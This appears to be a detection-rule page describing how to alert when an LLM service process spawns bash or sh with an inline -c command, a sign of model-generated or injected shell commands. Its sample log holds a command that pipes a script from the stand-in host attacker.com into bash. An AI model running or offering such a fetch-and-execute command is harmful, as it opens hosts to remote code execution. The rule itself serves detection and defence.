highexperimentalLinuxAI/MLT1059.004

LLM Service Spawning Shell With Inline Command

Detects LLM service processes spawning bash or sh with an inline -c command argument. This indicates model-generated or injected shell commands are being executed directly, representing a critical code injection risk.

Updated Jan 15, 2025 · Detection Engineering Team

llmimproper-outputlinuxshell-executionowasp-llm05

Problem Statement

Passing model-generated text directly to a shell -c argument treats LLM output as trusted code. This is a critical improper output handling vulnerability enabling arbitrary OS command execution.

Sample Logs

{"timestamp":"2025-01-15T16:08:33Z","computer_name":"llm-host-01","user":"llm_svc","image":"/bin/bash","command_line":"bash -c 'curl http://attacker.com/shell.sh | bash'","parent_image":"/opt/llm/app/code_executor.py"}

Required Fields

image

command_line

parent_image

user

computer_name

False Positives

·Sandboxed code execution tools that intentionally run model-generated shell commands in an isolated environment

Tuning Guidance

If the LLM service legitimately executes generated code, ensure a sandboxed subprocess handler is the only permitted parent. Alert on all other LLM process paths.